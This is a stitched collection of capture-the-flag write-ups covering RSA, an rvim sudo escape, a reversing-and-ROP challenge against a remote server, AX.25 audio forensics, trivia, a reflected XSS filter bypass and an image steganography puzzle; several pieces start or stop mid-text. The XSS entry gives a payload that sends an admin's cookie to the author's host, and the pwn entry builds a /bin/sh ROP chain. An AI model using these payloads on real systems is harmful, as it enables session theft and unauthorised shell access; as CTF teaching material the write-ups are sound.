int('0x7fe1a4f743675d1987d25d38111fae0f78bbea6852cba5beda47db76d119a3efe24cb04b9449f53becd43b0b46e269826a983f832abb53b7a7e24a43ad15378344ed5c20f51e268186d24c76050c1e73647523bd5f91d9b6ad3e86bbf9126588b1dee21e6997372e36c3e74284734748891829665086e0dc523ed23c386bb520', 16)N = int('0xa22b591571af4e0d465774b82ccd9952eb479fdfdd551800c2940b1c114e25414fc62c60086563df6cba2fc164cafd0db253299dddfa57d8c4e87af9f271ef9e0cb10ab85139e5cf52ae39ff7f833380fbf3439e374c31ea26b2224b2d18cb194e3b3bb13cd6409c978e3e8ff35794ed4cf8cad0305b2b05b2ee66c09ca272ef', 16) d = int('0x1af78e760bba4f7b55ffffd7b9f22090a00f9ac629697fd7a971b64f81d6a3bbf6c552c3c29abe5aea07257e6fcfd2f63186da31252bbe03278732f8a4d8f7f35f8cbed38ac95f5be92aedbf093414750d11acb8a00afc9abf4d3b496d849436ef1826c27a03e362ed62f74ccc421f8c3e62d6b5967578220808b3f62b2f6c71', 16) m = hex(pow(c, d, N)).rstrip("L").replace("0x","") print(binascii.unhexlify(m))``` Let's run the code: ```consoleλ ~/Downloads/crypto03/ python solve.pyALEXCTF{RS4_I5_E55ENT1AL_T0_D0_BY_H4ND}```
# VimJail (pwn) ###ENG[PL](#pl-version) In the task we get credentials to log-in on the server via SSH.We are `ctfuser` user and we can see that there is `flagReader` binary in our home, but with it's only executable for `secretuser`.The binary also has GUID bit set, so it can read flag in the `/.flag`. By checking sudoers we notice that, as expected from the task name, we can sudo on secretuser when running `rvim`: ```sudo -u secretuser rvim``` The problem is that rvim restricts shell commands execution, so we can't simply run the `flagReader`.It took us a lot of time to figure this out but finally we noticed that we can use a custom `.vimrc` file when starting rvim, and commands in such file will be executed with the current user provileges! So by using file: ```python3 import ospython3 os.system("/home/ctfuser/flagReader /.flag")``` And running: ```sudo -u secretuser rvim -u ourvimrcfile``` gives the flag `flag{rVim_is_no_silverbullet!!!111elf}` ###PL version W zadaniu dostajemy dane do logowania na serwer po SSH.Logujemy się jako `ctfuser` i możemy zobaczyć ze ` home jest binarka `flagReader`, ale można jej użyć tylko jako `secretuser`.Binarka dodatkowo ma ustawiony GUID i może odczytać flagę z `/.flag`. Po sprawdzeniu listy sudoers widzimy, że, zgodnie z oczekiwaniami po nazwie zadania, możemy zrobić sudo na secretusera uruchamiając `rvim`: ```sudo -u secretuser rvim``` Problem polega na tym, że rvim nie pozwala na uruchamianie komend shell więc nie możemy po prostu uruchomić `flagReader`.Zajęło nam dość sporo czasu wpadnięcie na rozwiązanie, ale finalnie zauważyliśmy, że można przy starcie podać własny plik `.vimrc` a komendy z tego pliku zostaną wykonane z uprawnieniami aktualnego użytkownika! Więc używając pliku: ```python3 import ospython3 os.system("/home/ctfuser/flagReader /.flag")``` I uruchamiając: ```sudo -u secretuser rvim -u ourvimrcfile``` Dostajemy flagę `flag{rVim_is_no_silverbullet!!!111elf}`
# meow (RE/Crypto/Pwn 365) ###ENG Judging by points alone, this was most difficult challenge on the CTF - probably because of unusual mix of cryptography, RE and PWN. We are given strange binary, that asks us for a password and decrypts two chunks od data with it: ```asmlea rdi, aHello? ; "***** hello? *****\n>>> "mov eax, 0call _printfmov rdx, cs:__bss_start ; streamlea rax, [rbp+s]mov esi, 0Bh ; nmov rdi, rax ; scall _fgetslea rax, [rbp+s]mov rdi, raxcall check_md5mov [rbp+var_1C], eaxcmp [rbp+var_1C], 1jnz short oklea rdi, aSorryBye ; "Sorry, bye!"call _putsmov edi, 0 ; statuscall _exit; --------------------------------------------------------------------------- ok: ``` and `check_md5` is: ```asmcheck_md5 proc near ; CODE XREF: main+152 var_98 = qword ptr -98hvar_90 = byte ptr -90hs2 = byte ptr -30hvar_28 = qword ptr -28hs1 = byte ptr -20hvar_4 = dword ptr -4 push rbp mov rbp, rsp sub rsp, 0A0h mov [rbp+var_98], rdi mov [rbp+var_4], 0 mov rax, 618F652224A9469Fh mov qword ptr [rbp+s2], rax mov rax, 14B97D8EE7DE0DA8h mov [rbp+var_28], rax lea rax, [rbp+var_90] mov rdi, rax call _MD5_Init mov rcx, [rbp+var_98] lea rax, [rbp+var_90] mov edx, 0Ah mov rsi, rcx mov rdi, rax call _MD5_Update lea rdx, [rbp+var_90] lea rax, [rbp+s1] mov rsi, rdx mov rdi, rax call _MD5_Final lea rcx, [rbp+s2] lea rax, [rbp+s1] mov edx, 10h ; n mov rsi, rcx ; s2 mov rdi, rax ; s1 call _strncmp test eax, eax jz short loc_1460 mov eax, 1 jmp short locret_1465; --------------------------------------------------------------------------- loc_1460: ; CODE XREF: check_md5+92 mov eax, 0 locret_1465: ; CODE XREF: check_md5+99 leave retncheck_md5 endp``` So this binary is computing md5 hash of our input, and compares it to hardcoded value. Of course we expected that this md5 will be easily crackable, or at least in some online database.This turned out not to be the case - it was impossible to crack this hash (at least with our budget, we're not NSA). Even though the password has only 10 characters, so it's not very strong. So we looked further - what does this program do with our password later? This is more readable in C: ```c decrypt(&first_chunk, &our_password, first_len); decrypt(&second_chunk, &our_password, second_len); qmemcpy_(&blob_1, v17, first_len, &first_chunk); qmemcpy_(&blob_2, v16, second_len, &second_chunk);``` And later, main function of program: ```c__int64 sub_C45(){ int v1; // [sp+Ch] [bp-4h]@1 v1 = 1; puts("- What kind of pet would you like to have?\n- Select the number of pet!"); printf("1. angelfish\n2. bear\n3. cat\n4. dog\n5. I don't want pets\n# number = "); __isoc99_fscanf(_bss_start, "%1d", &v1;; if ( v1 <= 0 || v1 > 5 ) { puts("*** bad number ***"); exit(0); } switch ( v1 ) { case 1: sub_C00(); break; case 2: sub_C17(); break; case 3: blob_1(); // <- here break; case 4: sub_C2E(); break; case 5: exit(0); break; } return 0LL;}``` So this program decrypts code with our password, and executes it! This gives us some possiblities, but not much - for example, we can guess prologue and epilogue of function. Now let's look at encryption. We reimplemented it in python as follows: ```pythondef decrypt_chunks(data, passw, k, sd, s0, st): """ encrypt chunks with size k start with [s0 bytes from front] [k-s0 bytes from back] start with s=s0 after every round add sd to s when s == st, change s to s0 again """ buff = [0] * 16 split = s0 of = 0 ob = len(data) for i in range(len(data) / k): for j in range(split): buff[j] = data[j + of] for j in range(k - split): buff[j + split] = data[split + ob - k + j] for j in range(k): buff[j] ^= passw[j] for j in range(split): data[j + of] = buff[j + k - split] for j in range(k - split): data[split + ob - k + j] = buff[j] of += split ob -= k - split if split == st: split = s0 else: split += sd def decrypt(data, passw): pass1 = [passw[2*i+1] for i in range(5)] decrypt_chunks(data, passw, 7, 2, 3, 7) decrypt_chunks(data, pass1, 5, -1, 5, 1) decrypt_chunks(data, passw, 10, 1, 4, 8) decrypt_chunks(data, passw, 10, 1, 4, 8)``` And encryption, because it's easy to guess knowing how to decrypt: ```pythondef encrypt_chunks(data, passw, k, sd, s0, st): """ encrypt chunks with size k start with [s0 bytes from front] [k-s0 bytes from back] start with s=s0 after every round add sd to s when s == st, change s to s0 again """ buff = [0] * 16 split = s0 of = 0 ob = len(data) for i in range(len(data) / k): for j in range(split): buff[j + k - split] = data[j + of] for j in range(k - split): buff[j] = data[split + ob - k + j] for j in range(k): buff[j] ^= passw[j] for j in range(split): data[j + of] = buff[j] for j in range(k - split): data[split + ob - k + j] = buff[j + split] of += split ob -= k - split if split == st: split = s0 else: split += sd def encrypt(data, passw): pass1 = [passw[2*i+1] for i in range(5)] encrypt_chunks(data, passw, 10, 1, 4, 8) encrypt_chunks(data, passw, 10, 1, 4, 8) encrypt_chunks(data, pass1, 5, -1, 5, 1) encrypt_chunks(data, passw, 7, 2, 3, 7)``` And that's basically all we know. We also have encrypted blobs: ```pythondata0 = """F1 64 72 4A 4F 48 4D BA 77 73 1D 34 F5 AF B8 0F24 56 11 65 47 A3 2F 73 A4 56 4F 70 4A 13 57 9C3F 6F 06 61 40 90 AF 39 10 29 34 C3 00 7A 40 3D4E 3F 0E 2A 2F 20 7F 73 89 7D 4B 1D 09 AA D0 0021 89 4D 2A 67 7C 18 3B 39 F2 8D 1C A7 71 57 2E31 14 67 48 3C 7D AF 70 AE 10 31 68 D1 26 05 C825 F2 62 F5 5D 38 34 F2 20 0E 7E 9F FB 57 72 2657 67 15 10 15 13 B9 3E 79 89 5D 24 12 01 98 7B18 25 E0 DF 7C 24 1B 2D 44 B0 10 3D 57 3D 62 B421 1D 3E D1 10 D7 45 74 96 2B 6D 3B ED 10 00 6731 DF 6C B8 86 1A 7C 6B 64 78 C6 37 76 E6 61 A0AD BE 4C BA A7 0D""".replace('\n', '').replace(' ', '').decode('hex') data1 = """08 4F FE AB 4E AA B4 03 4D 99 6E A1 48 D0 7D A2E0 49 38 61 2D BC 5E 2C 5D 62 3F 89 C6 B8 5C 5A4B 13 41 07 DF BF C2 29 07 64 14 25 32 00 73 692D 58 4B 76 15 29 2F A1 00 00 00 00 00 00 00 00""".replace('\n', '').replace(' ', '').decode('hex')``` That's the end of `RE` part (not very easy, but manageable), now comes `Crypto`. How can we decrypt the code, and second blob? Well, If we look at the "encrypt" function, it's just a lot of xors with password characters, and permuting order. What exactly is xored? Maybe it's possible to reverse it easily? Let's check. I used our SymbolicXor class (it's very useful in situations like this) ```pythonclass SymbolicXor: def __init__(self, ops, const=0): if isinstance(ops, str): ops = [ops] self.ops = sorted(ops) self.const = const def __xor__(self, other): if isinstance(other, int): return SymbolicXor(self.ops, self.const ^ other) elif isinstance(other, SymbolicXor): return SymbolicXor(self.setxor(self.ops, other.ops), self.const ^ other.const) __rxor__ = __xor__ def setxor(self, a, b): out = list(a) for el in b: if el in out: out.remove(el) else: out.append(el) return out def __str__(self): if self.const == 0 and not self.ops: return '0' return '^'.join(str(c) for c in self.ops + ([self.const] if self.const else [])) __repr__ = __str__ def __eq__(self, oth): return self.ops == oth.ops and self.const == oth.const``` And:```pythondef make_sympad(syms): passw = [SymbolicXor('v'+str(i)) for i in range(16)] pad = map(ord, '\0' * syms) decrypt(pad, passw) return pad def permute(data): perm = map(ord, data) decrypt(perm, [0]*16) return ''.join(map(chr, perm)) def transform(data, maps): # pad - encrypted and permutted zeroes - so plain 'one time pad' generated from password pad = make_sympad(len(data)) # perm - permutation of encrypted data, so they are in original order perm = permute(data) out = '' for i in range(len(data)): a = pad[i] #print perm[i].encode('hex'), for con, sym in maps: if sym == a: #print chr(ord(perm[i]) ^ con).encode('hex'), a #print chr(ord(perm[i]) ^ con), a c = chr(ord(perm[i]) ^ con) if c not in string.printable: return None out += c break else: #print '?', a out += '?' return out``` This allowed me to show all constraints, or rather answer the question `"what is this byte xored with"` ```00 ? v2^v5aa ? v2^v348 ? v1^v8d0 ? v3^v9b4 ? v0^v3^v5^v900 ? v1^v3^v5^v600 ? v2^v5^v6^v74d ? v0^v3^v7^v800 ? v3^v45d ? v4^v862 ? v2^v3^v5^v9a1 ? v0^v3^v5^v64f O 0fe ? v8^v94e ? v1^v3^v7^v929 ? v3^v500 ? v4^v5^v713 ? v0^v5^v7^v889 ? v1^v4^v6^v9a1 ? v0^v1^v4^v700 ? v1^v3^v5^v800 ? v2^v5^v6^v938 ? v0^v2^v4^v95a ? v1^v3^v5^v74b ? v2^v4^v6^v941 ? v1^v5^v7^v9b8 ? v1^v832 ? v3^v6^v7^v92c ? v7^v861 a 076 ? v2^v507 ? v2^v325 ? v4^v5^v8^v929 ? v1^v5^v9df ? v3^v973 ? v3^v569 ? v5^v6c2 ? v0^v707 ? v0^v2^v664 ? v1^v3^v714 ? v2^v4^v8bf ? v1^v3^v4^v958 ? v0^v14b ? v1^v33f ? v0^v2^v3^v52d ? v1^v72d ? v0^v2^v3^v7bc ? v1^v3^v4^v915 ? v2^v308 ? v4^v92f ? v1^v3^v5^v9c6 ? v2^v3^v5^v65c ? v0^v3^v5^v75e ? v0^v1^v4^v57d } 0a2 ? v0^v2^v3^v7e0 ? v1^v3^v5^v849 ? v2^v4^v7^v9ab ? v5^v699 ? v1^v76e ? v3^v803 ? v1^v3^v4^v900 ? v0^v100 ? v1^v3``` First column: value in ciphertextSecond column: plaintext byte, if known (known only if we're xoring with zero, of course)Third column: password chars we're xoring with (v0 = first char, v1 = second char, etc) Ok, it's something but not enough. In fact, this was very misleading, because we thought that this second encrypted blob is flag, or at least plaintext (all known bytes are printable)! This turned out not to be the case, and I wasted a lot of time, unfortunatelly. But to the point, I think word of explaination is due (i skipped a lot of things). What does this even do: ```pythondef make_sympad(syms): passw = [SymbolicXor('v'+str(i)) for i in range(16)] pad = map(ord, '\0' * syms) decrypt(pad, passw) return pad def permute(data): perm = map(ord, data) decrypt(perm, [0]*16) return ''.join(map(chr, perm)) def transform(data, maps): # pad - encrypted and permutted zeroes - so plain 'one time pad' generated from password pad = make_sympad(len(data)) # perm - permutation of encrypted data, so they are in original order perm = permute(data)``` So, I knew that everything is just xoring - so in theory if I'll encrypt zeroes, I'll know exactly what gets xored with what (because of SymbolicXor class). But there is small problem, order of characters in ciphertext is permuted, so I had to create `permute` function that reverses that permutation (I know, not the best name). Going back to our ciphertexts - I discovered that if we decrypt both ciphertexts, they both have the same start and similar end. And because we know that first ciphertext is code, that means that second CT must be too. What can we do with this knowledge? A lot!. We assumed most standard prologue and epilogue, and came out with something like this (excuse non-standard notation) - for fragments that was the same in both ciphertexts: ``` ((0x55 ^ 0x0d), SymbolicXor(['v5', 'v2'])), # push rbp ((0x48 ^ 0x48), SymbolicXor(['v2', 'v3'])), # mov rbp, rsp ((0x89 ^ 0xf5), SymbolicXor(['v1', 'v8'])), ((0xe5 ^ 0xaf), SymbolicXor(['v3', 'v9'])), ((0x48 ^ 0x4d), SymbolicXor(['v0', 'v3', 'v5', 'v9'])), # lea rdi [stuff] ((0xa7 ^ 0xC3), SymbolicXor(['v1', 'v3'])), # ret at the end``` This list means for example that `v5 ^ v2 == 0x55 ^ 0x0d`. So what? Well, by itself it's useless, but remember that we know md5 of whole password! So now we can intelligently bruteforce everything: ```pythonimport hashlibimport string charset = string.printablesought = '9F46A92422658F61A80DDEE78E7DB914'.decode('hex') for o1 in map(ord, charset): o3 = o1 ^ (0xa7 ^ 0xc3) o8 = o1 ^ (0x89 ^ 0xf5) o2 = o3 ^ (0x48 ^ 0x48) o5 = o2 ^ (0x55 ^ 0x0d) o9 = o3 ^ (0xe5 ^ 0xaf) o0 = o3 ^ o5 ^ o9 ^ (0x48 ^ 0x4d) v0 = chr(o0) v1 = chr(o1) v2 = chr(o2) v3 = chr(o3) v5 = chr(o5) v8 = chr(o8) v9 = chr(o9) for v4 in charset: for v6 in charset: for v7 in charset: passw = v0 + v1 + v2 + v3 + v4 + v5 + v6 + v7 + v8 + v9 if hashlib.md5(passw).digest() == sought: print passw``` And... it worked! ```$ ./brute$W337k!++y``` Awesome, let's use it and get the flag: ```╰─$ ./meow.exe***** hello? *****>>> $W337k!++y- What kind of pet would you like to have?- Select the number of pet!1. angelfish2. bear3. cat4. dog5. I don't want pets# number = 3Did you choose a cat?????What type of cat would you prefer? '0'>>>0fish: “./meow.exe” terminated by signal SIGSEGV (Address boundary error)``` Wait, what? WTF codegate, where is my flag? Let's reverse what happened. This is decrypted function that gets called: ```asmsub_7FFF3A41CC70 proc near var_60= qword ptr -60hvar_58= qword ptr -58hvar_50= qword ptr -50hvar_48= qword ptr -48hvar_40= qword ptr -40hvar_38= qword ptr -38hvar_30= qword ptr -30hvar_28= qword ptr -28hvar_20= dword ptr -20hvar_1C= byte ptr -1Ch push rbpmov rbp, rspsub rsp, 60hmov rax, 20756F7920646944hmov [rbp+var_60], raxmov rax, 612065736F6F6863hmov [rbp+var_58], raxmov rax, 3F3F3F3F74616320hmov [rbp+var_50], raxmov rax, 7420746168570A3Fhmov [rbp+var_48], raxmov rax, 6320666F20657079hmov [rbp+var_40], raxmov rax, 646C756F77207461hmov [rbp+var_38], raxmov rax, 65727020756F7920hmov [rbp+var_30], raxmov rax, 273027203F726566hmov [rbp+var_28], raxmov [rbp+var_20], 3E3E3E0Ahmov [rbp+var_1C], 0lea rax, [rbp+var_60]mov edx, 44hmov rsi, raxmov edi, 1mov eax, 1syscalllea rax, [rbp+8]mov edx, 18hmov rsi, raxmov edi, 0mov eax, 0syscallnopleaveretnsub_7FFF3A41CC70 endp``` See it yet? Yes, this code reads 18 bytes **on the stack, overwriting the return address**. Yeah, we're in pwn challenge now. But this won't stop us. Fortunatelly, exploit turned out to be easier than I thought, because second ciphertext was clearly meant to help us: ```asmsub_7FFF3A41CC30 proc near var_8= qword ptr -8 push rbpmov rbp, rspsub rsp, 10hmov [rbp+var_8], rdimov rax, [rbp+var_8]mov edx, 0mov esi, 0mov rdi, raxmov eax, 3Bhsyscallnopleaveretnsub_7FFF3A41CC30 endp ; ---------------------------------------------------------------------------db 0db 0aBinSh db '/bin/sh',0db 0db 0db 0db 0db 0 ; =============== S U B R O U T I N E ======================================= sub_7FFF3A41CC66 proc nearpop rdiretn``` Additionally this code was loaded at constant offset in memory, so this should be easy as PWN 100 in High-School CTF. Our ROP chain will look like this: ```[pop rdi gadget]"/bin/sh"[shellcode]``` So we'll pop "/bin/sh" to edi, and execute execve systall with it. Easy enough wth pwnlib! ```pythonfrom pwn import * r = remote('110.10.212.139', 50410) print r.recv() r.send('$W337k!++y\n') print r.recv()print r.recv() r.send('3\n') print r.recv() import struct ra = struct.pack('
# BSidesSF CTF 2017 - Latlong (Forensics 150) >Transmission Received. >This challenge was created by our pal @arirubinstein.>He was not informed of the flag format, so expect this one to be look something like flag{...} The file seems to be an audio file and at first I thought it was a 56Kbps "Dial-up modem noise" (who used to connect to the Internet some years ago, will definitely remember). But luckily, shortly after the admins posted an hint: >Hint - "Ax25 will lead you in the direction" AX.25 (Amateur X.25) is a data link layer protocol suite and designed for use by amateur radio operators. So it was clear that we had to decode the file using the protocol [specification](https://www.tapr.org/pub_ax25.html). I started reading the protocol specification, and I was going to implement a decoder, but I was sure I could find something already implemented. I found this decoder on GitHub: [Invasive](https://github.com/h2so5/Invasive) And opening the file audio with this decoder showed the flag: ![flag](./latlong.png)
<span>Trivia 10 - Hello there</span><span>Description</span>Why not drop us a few lines and say hi :).<span>Solution</span>The topic on the IRC channel #alexctf on Freenode is "Alexandria University student held capture the flag event ctf.oddcoder.com ALEXCTF{W3_w15h_y0u_g00d_luck}"<span>Flag</span><span>ALEXCTF{W3_w15h_y0u_g00d_luck}</span>
Moana and her friends were out on a sea voyage, spending their summer joyously. Unfortnately, they came across Charybdis, the sea monster. Charybdis, furious over having unknown visitors, wreaked havoc on their ship. The ship was lost.Luckily, Moana survived, and she was swept to a nearby island. But, since then, she has not seen her friends. Moana has come to you for help. She believes that her friends are still alive, and that you are the only one who can help her find them. and give us one photo
#yoso(web, 250, 38 solves)> You only live once, so why search twice? > (admins love to search for flags btw) ![scr1](scr1.png) We are able to send a link to admin, which he then visits. Our goal is to download admin's bookmarks. After some investigation, we found a reflected xss at `http://78.46.224.80:1337/download.php?zip=<script>alert("hello world")</script>` So all we have to do now is either steal the admins'c cookie or get the zip with a ajax/xmlhttp request and then send a request to `ourdomain.com/+data`. We'll go with the first option, as it's a lot easier. Payload: ``` javascript <script> window.location = "http://nazywam.host/itWorks!"+document.cookie </script> ``` Unfortunately, the zip parameter is filtered, all dots are removed. So we have to find a way to bypass it. * `nazywam.host` can be easily changed into a decimal ip, `1558071511` * `window.location` and `document.cookie` can be written as `window["location"]` and `document["cookie"]` * `string + string` -> `string["concat"](string)` Final payload: ``` javascript <script>window["location"] = "http://1558071511/itWorks!"["concat"](document["cookie"]) </script> ```` This allows us to get the cookie ```78.46.224.80 - - [29/Dec/2016:11:46:48 +0100] "GET /itWorks!PHPSESSID=ol8gur9chbfq0g0ufnm6h8vrc1 HTTP/1.1" 404 143 "http://78.46.224.80:1337/download.php?zip=%3Cscript%3Ewindow[%22location%22]%20=%20%22http://1558071511/itWorks!%22[%22concat%22](document[%22cookie%22])%20%3C/script%3E" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"``` And finally, the flag: `33C3_lol_wHo_needs_scr1pts_anyway`
<span>Trivia 20 - SSL 0day<span>Description</span>It lead to memory leakage between servers and clients rending large number of private keys accessible. (one word)<span>Solution</span>"The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet." <span>(Source)</span><span>Flag: </span>Heartbleed</span>
# Programmin question 1 - 200pts ~~~~We unearthed this text file from one of the older servers and want to know what this is all about. Could you please analyse this and let us know your finding? abc.txt~~~~ ## Solution The file gives us a list of triplets which obviously seem like pixels, since most of them are (255, 255, 255), i.e., black pixel. The standard python module for image manipulation is *PIL* so all we had to do was reading the pixels and creating an image from it. In order to read the list as a list and not a string, we trusted eval() (!DANGER!). Fortnuately HackIM guys did not insert a malware in the middle of that mess :) The second point we had to think about was image dimensions. Ok, here are the pixels, but how should we display then? 512x512? 1000x1000? First I realized (!) the product of the dimensions must be the quantity of tuples (yep, the area of a square). The solution is pretty obvious actually, although it took me almost an hour to figure it out. My first idea was to brute force the dimensions: factorize the lenght of the list into primes and try all possible integers *a* and *b* such that *a*b = len(list)\*. It happens I was complicating it. The lenght of the list is 528601, which, according to factorDB, is 569\*929. So there you go, with the dimensions the solution is straight forward.
Flagception======== > John Hammond | Tuesday, February 7th, 2017 -------------------------------------------- > Yo dawg, I heard you like flags> > So I put a flag in your flag> > Flag format: BITSCTF{a1phanum3r1c_w0rds} This challenge was really intimidating because there was no link or download or really anything to work with; it was super vague and open-ended. Usually that means the challenge is referring to something on the [CTF] game site, like a web page source or a logo or something. That led me to look at their logo... And the _do_ have a flag in their logo. ![logo.png](logo.png) With some further inspection, I saw some peculiar colors in that flag... ![zoomin.png](zoomin.png) Some of the pixels in the top-left corner are darker in the other! The width is about `8` for those strange pixels... this must be a bunch of bytes represented in binary. I cut those out with a `1` being the darker color and a `0` being the lighter color. Then I cooked it in [Python]: ``` python#!/usr/bin/env python print ''.join([chr(int(i,2)) for i in '1000010 1001001 1010100 1010011 1000011 1010100 1000110 1111011 1100110 0110001 1100001 1100111 1100011 0110011 1110000 1110100 0110001 0110000 1101110 1111101'.split(' ')])``` Bah. __The flag was: `BITSCTF{f1agc3pt10n}`__ [netcat]: https://en.wikipedia.org/wiki/Netcat[Wikipedia]: https://www.wikipedia.org/[Linux]: https://www.linux.com/[man page]: https://en.wikipedia.org/wiki/Man_page[man pages]: https://en.wikipedia.org/wiki/Man_page[man]: https://en.wikipedia.org/wiki/Man_page[PuTTY]: http://www.putty.org/[ssh]: https://en.wikipedia.org/wiki/Secure_Shell[Windows]: http://www.microsoft.com/en-us/windows[virtual machine]: https://en.wikipedia.org/wiki/Virtual_machine[operating system]:https://en.wikipedia.org/wiki/Operating_system[OS]: https://en.wikipedia.org/wiki/Operating_system[VMWare]: http://www.vmware.com/[VirtualBox]: https://www.virtualbox.org/[hostname]: https://en.wikipedia.org/wiki/Hostname[port number]: https://en.wikipedia.org/wiki/Port_%28computer_networking%29[port]: https://en.wikipedia.org/wiki/Port_%28computer_networking%29[ports]: https://en.wikipedia.org/wiki/Port_%28computer_networking%29[distribution]:https://en.wikipedia.org/wiki/Linux_distribution[Ubuntu]: http://www.ubuntu.com/[ISO]: https://en.wikipedia.org/wiki/ISO_image[standard streams]: https://en.wikipedia.org/wiki/Standard_streams[standard output]: https://en.wikipedia.org/wiki/Standard_streams[standard input]: https://en.wikipedia.org/wiki/Standard_streams[read]: http://ss64.com/bash/read.html[variable]: https://en.wikipedia.org/wiki/Variable_%28computer_science%29[command substitution]: http://www.tldp.org/LDP/abs/html/commandsub.html[permissions]: https://en.wikipedia.org/wiki/File_system_permissions[redirection]: http://www.tldp.org/LDP/abs/html/io-redirection.html[redirect]: http://www.tldp.org/LDP/abs/html/io-redirection.html[pipe]: http://www.tldp.org/LDP/abs/html/io-redirection.html[piped]: http://www.tldp.org/LDP/abs/html/io-redirection.html[piping]: http://www.tldp.org/LDP/abs/html/io-redirection.html[tmp]: http://www.tldp.org/LDP/Linux-Filesystem-Hierarchy/html/tmp.html[curl]: http://curl.haxx.se/[cl1p.net]: https://cl1p.net/[request]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html[POST request]: https://en.wikipedia.org/wiki/POST_%28HTTP%29[Python]: http://python.org/[interpreter]: https://en.wikipedia.org/wiki/List_of_command-line_interpreters[requests]: http://docs.python-requests.org/en/latest/[urllib]: https://docs.python.org/2/library/urllib.html[file handling with Python]: https://docs.python.org/2/tutorial/inputoutput.html#reading-and-writing-files[bash]: https://www.gnu.org/software/bash/[Assembly]: https://en.wikipedia.org/wiki/Assembly_language[the stack]: https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29[register]: http://www.tutorialspoint.com/assembly_programming/assembly_registers.htm[hex]: https://en.wikipedia.org/wiki/Hexadecimal[hexadecimal]: https://en.wikipedia.org/wiki/Hexadecimal[archive file]: https://en.wikipedia.org/wiki/Archive_file[zip file]: https://en.wikipedia.org/wiki/Zip_%28file_format%29[.zip]: https://en.wikipedia.org/wiki/Zip_%28file_format%29[gigabytes]: https://en.wikipedia.org/wiki/Gigabyte[GB]: https://en.wikipedia.org/wiki/Gigabyte[GUI]: https://en.wikipedia.org/wiki/Graphical_user_interface[Wireshark]: https://www.wireshark.org/[FTP]: https://en.wikipedia.org/wiki/File_Transfer_Protocol[client and server]: https://simple.wikipedia.org/wiki/Client-server[RETR]: http://cr.yp.to/ftp/retr.html[FTP server]: https://help.ubuntu.com/lts/serverguide/ftp-server.html[SFTP]: https://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol[SSL]: https://en.wikipedia.org/wiki/Transport_Layer_Security[encryption]: https://en.wikipedia.org/wiki/Encryption[HTML]: https://en.wikipedia.org/wiki/HTML[Flask]: http://flask.pocoo.org/[SQL]: https://en.wikipedia.org/wiki/SQL[and]: https://en.wikipedia.org/wiki/Logical_conjunction[Cyberstakes]: https://cyberstakesonline.com/[cat]: https://en.wikipedia.org/wiki/Cat_%28Unix%29[symbolic link]: https://en.wikipedia.org/wiki/Symbolic_link[ln]: https://en.wikipedia.org/wiki/Ln_%28Unix%29[absolute path]: https://en.wikipedia.org/wiki/Path_%28computing%29[CTF]: https://en.wikipedia.org/wiki/Capture_the_flag#Computer_security[Cyberstakes]: https://cyberstakesonline.com/[OverTheWire]: http://overthewire.org/[Leviathan]: http://overthewire.org/wargames/leviathan/[ls]: https://en.wikipedia.org/wiki/Ls[grep]: https://en.wikipedia.org/wiki/Grep[strings]: http://linux.die.net/man/1/strings[ltrace]: http://linux.die.net/man/1/ltrace[C]: https://en.wikipedia.org/wiki/C_%28programming_language%29[strcmp]: http://linux.die.net/man/3/strcmp[access]: http://pubs.opengroup.org/onlinepubs/009695399/functions/access.html[system]: http://linux.die.net/man/3/system[real user ID]: https://en.wikipedia.org/wiki/User_identifier[effective user ID]: https://en.wikipedia.org/wiki/User_identifier[brute force]: https://en.wikipedia.org/wiki/Brute-force_attack[brute-force]: https://en.wikipedia.org/wiki/Brute-force_attack[for loop]: https://en.wikipedia.org/wiki/For_loop[bash programming]: http://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html[Behemoth]: http://overthewire.org/wargames/behemoth/[command line]: https://en.wikipedia.org/wiki/Command-line_interface[command-line]: https://en.wikipedia.org/wiki/Command-line_interface[cli]: https://en.wikipedia.org/wiki/Command-line_interface[PHP]: https://php.net/[URL]: https://en.wikipedia.org/wiki/Uniform_Resource_Locator[TamperData]: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/[Firefox]: https://www.mozilla.org/en-US/firefox/new/?product=firefox-3.6.8&os=osx%E2%8C%A9=en-US[Caesar Cipher]: https://en.wikipedia.org/wiki/Caesar_cipher[Google Reverse Image Search]: https://www.google.com/imghp[PicoCTF]: https://picoctf.com/[JavaScript]: https://www.javascript.com/[base64]: https://en.wikipedia.org/wiki/Base64[client-side]: https://en.wikipedia.org/wiki/Client-side_scripting[client side]: https://en.wikipedia.org/wiki/Client-side_scripting[javascript:alert]: http://www.w3schools.com/js/js_popup.asp[Java]: https://www.java.com/en/[2147483647]: https://en.wikipedia.org/wiki/2147483647_%28number%29[XOR]: https://en.wikipedia.org/wiki/Exclusive_or[XOR cipher]: https://en.wikipedia.org/wiki/XOR_cipher[quipqiup.com]: http://www.quipqiup.com/[PDF]: https://en.wikipedia.org/wiki/Portable_Document_Format[pdfimages]: http://linux.die.net/man/1/pdfimages[ampersand]: https://en.wikipedia.org/wiki/Ampersand[URL encoding]: https://en.wikipedia.org/wiki/Percent-encoding[Percent encoding]: https://en.wikipedia.org/wiki/Percent-encoding[URL-encoding]: https://en.wikipedia.org/wiki/Percent-encoding[Percent-encoding]: https://en.wikipedia.org/wiki/Percent-encoding[endianness]: https://en.wikipedia.org/wiki/Endianness[ASCII]: https://en.wikipedia.org/wiki/ASCII[struct]: https://docs.python.org/2/library/struct.html[pcap]: https://en.wikipedia.org/wiki/Pcap[packet capture]: https://en.wikipedia.org/wiki/Packet_analyzer[HTTP]: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol[Wireshark filters]: https://wiki.wireshark.org/DisplayFilters[SSL]: https://en.wikipedia.org/wiki/Transport_Layer_Security[Assembly]: https://en.wikipedia.org/wiki/Assembly_language[Assembly Syntax]: https://en.wikipedia.org/wiki/X86_assembly_language#Syntax[Intel Syntax]: https://en.wikipedia.org/wiki/X86_assembly_language[Intel or AT&T]: http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm[AT&T syntax]: https://en.wikibooks.org/wiki/X86_Assembly/GAS_Syntax[GET request]: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Request_methods[GET requests]: 